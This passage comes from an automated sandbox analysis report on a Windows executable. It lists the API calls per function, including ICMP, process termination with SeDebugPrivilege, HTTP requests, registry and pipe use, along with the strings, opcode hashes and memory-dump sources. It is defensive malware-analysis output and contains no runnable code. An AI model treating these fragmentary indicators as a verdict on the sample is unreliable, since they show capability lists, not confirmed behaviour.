                                                            • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                            • String ID: 5$Ping
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleStringwprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            Similarity
                                                            • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            Similarity
                                                            • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                            • String ID:
                                                            Similarity
                                                            • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            Similarity
                                                            • API ID: Variant$Init$Clear
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                            • API String ID: 3467423407-1765764032
                                                            • Opcode ID: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                            • Instruction ID: d9fefd04702457fa4cedf052ea2e16d1149214fc2669b48c7854418f58822818
                                                            • Opcode Fuzzy Hash: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                            • Instruction Fuzzy Hash: 14A1A0BAA08B42C6EB10AF65E4407ADB7A0FB84B98F940136DE4D07754DF3CD445CB61
                                                            • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                            • String ID: -----$SysListView32
                                                            • API String ID: 2361508679-3975388722
                                                            • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                            • Instruction ID: 7c71e29fb73e4d8f0980d4261238bf33a748ef1fdf525924494c1113844d155f
                                                            • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                            • Instruction Fuzzy Hash: A851D07AA04B818AE720DF65E8447DDB7A5FB88784F80413AEE4C47B59CF38D994CB50
                                                            • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 2019164449-3381328864
                                                            • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                            • Instruction ID: 0bef07a122e261a6782a81901cce20f4a506e9dc7cc6a9129027dbc7e1909cf2
                                                            • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                            • Instruction Fuzzy Hash: 5B212FAAB1CA4390FA60BB11FA54779E350AF817C4F808037CE4D4B655EE3CE516D722
                                                            • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                            • String ID:
                                                            • API String ID: 1903627254-0
                                                            • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                            • Instruction ID: 8022c7e5fd2543fe72b19211c93460756ba10e97cf36fe13479f4610b2180d92
                                                            • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                            • Instruction Fuzzy Hash: A20251AAA08B82C6DB50EF29E4442ADA770FB84B84F915032DF4E47B64DF3CD545CB61
                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                            • String ID:
                                                            • API String ID: 3210457359-0
                                                            • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                            • Instruction ID: e882d6b6d360eaff289b241404527aba478e7dfb90eb2c566ed97b8a96eac604
                                                            • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                            • Instruction Fuzzy Hash: 0661B3ADB1854386F738BA25F860BB99651BF807A4F988133E91D436D5CE7DE840D323
                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 3721556410-2107944366
                                                            • Opcode ID: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                            • Instruction ID: fc76b49f881256a5e685f658373b4a1ab5e8298d587c4ec27f6216996754c18b
                                                            • Opcode Fuzzy Hash: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                            • Instruction Fuzzy Hash: 796180BAA14A52C5EB00EF61E8806ED7B74FB44B98F901137ED1D17BA9CE38D445C361
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                            • Instruction ID: db65a855bc085818a77237b8c8437438655bd174322693d827b86f0d614e2e72
                                                            • Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                            • Instruction Fuzzy Hash: 795176AAA08642C6EB14FB15E19037CBB60FF84B95F858432D60D07796DF7CE505CB25
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                            • String ID: 2$P
                                                            • API String ID: 93392585-1110268094
                                                            • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                            • Instruction ID: dea8583d2d4dda5f38f3dc66f98795d24c64101e679daf3556d8709e7f016191
                                                            • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                            • Instruction Fuzzy Hash: 2F51E3B6A0864289F710EF69F4403BDB7B6BB01758FA44176CA5D02694CF38E499C722
                                                            • API ID: Window$LongMessageSend$Show
                                                            • String ID: '
                                                            • API String ID: 257662517-1997036262
                                                            • Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                            • Instruction ID: a34ec60556a4922befdd0a564a512556ef6d3adf1e34f296dd7e5ab9ce7544cb
                                                            • Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                            • Instruction Fuzzy Hash: 5951E9BAA0C65285E768AB65B454F7DAB50FF81B90F949133DE6E03790CE3DE442C321
                                                            • API ID: IconLoad_invalid_parameter_noinfo
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 4060274358-404129466
                                                            • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                            • Instruction ID: 6eeb53206eed3ad4dc3846b848c8e26435c99b715149ddc29cb4774d88d06efc
                                                            • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                            • Instruction Fuzzy Hash: 19214DA9B0C78381FA54BF1AB9007B9F796AF44780FC45072DE4D46395EE7CE426D222
                                                            • API ID: HandleLoadModuleString$Messagewprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 4051287042-3128320259
                                                            • Opcode ID: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                            • Instruction ID: ea29f83b7e46ffd0a43de10da180df2ee103d450ffe1ad99bb4b2fecc87e828c
                                                            • Opcode Fuzzy Hash: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                            • Instruction Fuzzy Hash: BC1182B9718B8591D720AB10F4407EAA764FB88746FC04037DA8E43748CE3CC145C761
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            • Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                            • Instruction ID: a20c1fb2de6e0b88bc1e535c7706b3b6af3dcd03fd8ae6bca816a8515b63796a
                                                            • Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                            • Instruction Fuzzy Hash: 76A14ABA71868382E768AF25E144B79BBA0FB44B46F515036DE1943B98CF3CEC51C712
                                                            • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                            • String ID:
                                                            • API String ID: 50796853-0
                                                            • Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                            • Instruction ID: 9f2d42c59579bb9ef3b53a52a05fb73079a6593020b8e2fd9ddb471027ecdebe
                                                            • Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                            • Instruction Fuzzy Hash: D9B181BAB08642C6EB14EF65E0903BCA760FF85B84F818432EA4E57696CF3CD105C765
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                            • Instruction ID: 358111cb7ccc446181ecf5ae48c9c92bafa941f63355ab093b143960c5b2f99a
                                                            • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                            • Instruction Fuzzy Hash: F05197AEE0C14289FB65BB29B44437D9696AF41B04FAC4033C90D0E6D9DE3DA484D273
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                            • Instruction ID: ef09ca5209aec089109618086f4bbac659ec215a4c3be9ceca22c56561636f55
                                                            • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                            • Instruction Fuzzy Hash: 5641AEBA61868187E724DF61B454B6ABBA0F798BD2F504136EF8A03B58DF3CD444CB00
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                            • Instruction ID: b267f7d8985003f934bb630fb37e8dcfab5c53d05f1c5f6c3a0822608aa8c73c
                                                            • Opcode Fuzzy Hash: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                            • Instruction Fuzzy Hash: 40C104AAA0C682C6EA61AF15B00037DFB51BF40B84F95413BEA5E07395CF3CE841C726
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                            • String ID:
                                                            • API String ID: 2550207440-0
                                                            • Opcode ID: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                            • Instruction ID: 625b0a51ddd6ec369a4c1bcc20120a97a5af27b54f92a8ad8fe01122f3ba483c
                                                            • Opcode Fuzzy Hash: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                            • Instruction Fuzzy Hash: E6A1B2AAE0860295FB14EB25E5443BCA760FB44B88F99443BDE2E47395DF7CD480C362
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                            • Instruction ID: 36c25642b979b7df9bf5517a17ffc592cd09d3fdbd2922957d9d9135d95883ab
                                                            • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                            • Instruction Fuzzy Hash: 2CA1A0BAA086C087D7749F19B40076EFB75FB86B94F944126DA8913B68CB3CD452CF12
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Enabled
                                                            • String ID:
                                                            • API String ID: 3694350264-0
                                                            • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                            • Instruction ID: c86b626a9672c389f82eb3f0fbe85c42de1f94c3a031a0ef2f5771929aafe3d7
                                                            • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                            • Instruction Fuzzy Hash: C591B1A9E1868686FB78AB15E454BB9E391AF44B84F944033EA4D03795CF3CE491C323
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                            • Instruction ID: 3af228d785ab32dda113064467808417099a1d9052123bc6d7de9b8de767f70c
                                                            • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                            • Instruction Fuzzy Hash: 0F51A29AA0D2D156F7619B75610077DAFA2FB4ABD0F8C80B6DA4D07B46CA39E450C332
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                            • String ID:
                                                            • API String ID: 3401586794-0
                                                            • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                            • Instruction ID: 6e2892992cc2d2850bfdbfe7c25c4f0981d16d76c7236a4dc71bdc7ae5004be9
                                                            • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                            • Instruction Fuzzy Hash: 035193AA608B4286F714FF21B940BEEA7A0FB48B88F984036DE0D17B58DF39D455C751
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                            • String ID: DllGetClassObject
                                                            • API String ID: 668425406-1075368562
                                                            • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                            • Instruction ID: a5648c5a01283728780a3b2a82f5b722bced0516230f9a5bb7dd12f81b477df9
                                                            • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                            • Instruction Fuzzy Hash: C2519CAAA08B8682EB14AF1AF540369E761FB44B84F808036DF4D57B45DF7CF064C316
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                            • String ID:
                                                            • API String ID: 161812096-0
                                                            • Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                            • Instruction ID: 4dbbdaeb84b68b6788466622b9b2ee2ae4c68bc3b9884ad68a4d33edc1d3d493
                                                            • Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                            • Instruction Fuzzy Hash: 7941AE7AA04B4585EB50DF22E8807AC77B0FB45B88F954032DE4E07768CF38E455C711
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                            • Instruction ID: 10a084ea4a4fef0289efa16f568effb7e057f6526bf45030dfc335c1ec9de23b
                                                            • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                            • Instruction Fuzzy Hash: 7841C17AA08B8586E720DF11F4547EAA3A0FB89784FD40132FA8D07A58CF3DD149CB11
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                            • Instruction ID: 5b84b3706650241e572f2e159276feb66a4353e4d77eeba99b611fbcd98a8b47
                                                            • Opcode Fuzzy Hash: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                            • Instruction Fuzzy Hash: 1D318CA9A08B4685DA20AF16F444369B7A1FB84FD1F888237DA5E13794CE3CE484C755
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AllocByteCharMultiStringWide
                                                            • String ID:
                                                            • API String ID: 3603722519-0
                                                            • Opcode ID: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                            • Instruction ID: 09e1cad00eb480987aa9d392a4561de64a3d03f8565ac24c9728fdd27fa9d853
                                                            • Opcode Fuzzy Hash: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                            • Instruction Fuzzy Hash: 5B3160B6A08A8689DB20AF16F444369B7A1FB44F91F884277DE5E03795DF3CE484C711
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                            • Instruction ID: ef0f0e45f450b5f256efefa7b59cfbb1af856d380b8226f848ce8549fd165d79
                                                            • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                            • Instruction Fuzzy Hash: B5317ABA60868187E3609F65F494B1AB761EB88790F50913AEB9803B59CF3CD845CF11
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CreateHandlePipe
                                                            • String ID: nul
